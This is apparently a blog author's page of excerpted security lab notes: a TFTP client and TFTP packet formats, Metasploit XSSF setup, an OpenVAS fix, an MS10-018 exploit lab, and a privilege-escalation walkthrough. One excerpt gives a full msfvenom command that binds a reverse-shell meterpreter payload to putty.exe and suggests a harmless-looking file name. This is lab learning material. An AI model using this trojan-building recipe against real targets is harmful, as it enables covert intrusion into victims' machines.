
web安全
play maker
这个作者很懒,什么都没留下…
展开
-
python实现一个简单的tftp客户端
import socketimport pdbimport osimport rebuff_size=1024opcode={'read':b'\x00\x01','write':b'\x00\x02','data':b'\x00\x03','ack':b'\x00\x04','error':b'\x00\x05'}error_code={1:b'\x00\x01'+b'File not found',2:b'\x00\x02'+b'Access violation',3:b'\x00\x03原创 2020-12-18 09:50:55 · 691 阅读 · 2 评论 -
tftp协议学习--流量包格式解析
可以使用tftpd软件,它支持用作客户端、服务器端,开启两个tftpd分别用作客户端和服务器端进行使用,并使用wireshark来抓取流量包!本节我们看看TFTP数据包的组装方式,为我们代码实现该协议奠定基础。TFTP协议总共有5中不同数据包,分别对应读请求,写请求,数据块,接收回应(ACK),以及错误。前两种数据包格式一样,只不过某些值域设置有差别,剩下的三种数据包格式各不相同。但无论哪一种数据包,他们都包含一个值域叫操作码,用来定义该数据包属于那种类型。我们先看读请求和写请求数据包的格式,首先是2字原创 2020-12-18 09:34:07 · 1545 阅读 · 0 评论 -
kali2020 metasploit中安装xssf
先科学上网,在如下url中下载最新的那个压缩包https://code.google.com/archive/p/xssf/downloads再把data、lib、module、plugin四个目录中的文件复制到metasploit的安装目录里对应的四个文件夹里msf中加载xssf模块...原创 2020-12-16 20:12:30 · 859 阅读 · 1 评论 -
openvas 创建用户没有反应,也不知最初的那串长密码
gvm安装成功但是由于第一次执行gvm-setup结果中的密码串忘了使用gvmd 查询没有新用户使用gvmd --user=admin --new-password=123456也没用使用gvmd --create-user=test --password=123456也没有用。。。但是执行sudo runuser -u _gvm – gvmd --user=admin --new-password=admin成功了!登录成功!...原创 2020-12-14 08:59:41 · 897 阅读 · 1 评论 -
利用msfvenom制作绑定攻击代码的木马程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exeo参数指定输出文件名,这里使用payload.exe,一般会改成一些人畜无害的文件名-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。绑定程序自定义,只要能引诱到目标运行它,这里随便选用putty.exe选用payloaduse expl原创 2020-11-13 10:00:33 · 1132 阅读 · 0 评论 -
MS10-018漏洞利用
本次实验中,靶机xp系统的ip地址为192.168.94.132,攻击者kali系统的ip为192.168.94.135搜索MS10-018相关的漏洞利用payload,并选择其中一个配置好选项后进行攻击,kali中开启了8080端口作为服务器在xp系统靶机中,打开IE浏览器访问http://192.168.94.135:8080/n9dakZWR7ARJewO如下可见利用成功,并开启了一个新session...原创 2020-11-12 21:08:25 · 900 阅读 · 0 评论 -
渗透测试-权限提升实验
已经获得了普通用户权限(普通用户new),使用background命令暂时退出session2,使用post/multi/recon/local_exploit_suggester来利用已获得的普通账号,得到目标靶机中的更多漏洞信息由前面结果得到一些可能存在的漏洞,选择一个漏洞进行利用配置参数SESSION为2(前面得到的普通用户权限的session id),跟LHOST(kali的ip)如下得到一个system权限的新session...原创 2020-11-12 20:47:50 · 346 阅读 · 0 评论 -
对数据包修改参数
Get方法只需使用url的语法,在url中修改参数即可如Post方法使用hackbar插件很方便的添加参数,loadurl将当前页面的url加载到上面的框,勾选post data,添加post的参数,execute即可怎么使用burpsuite修改?如何直接对数据包进行修改从而post参数?解答如下:使用?来添加get方法参数时发送的数据包使用hackbar添加参数时的数据包(如下图),观察学习得知,关键修改三个地方①Get方...原创 2020-10-17 08:39:01 · 1189 阅读 · 0 评论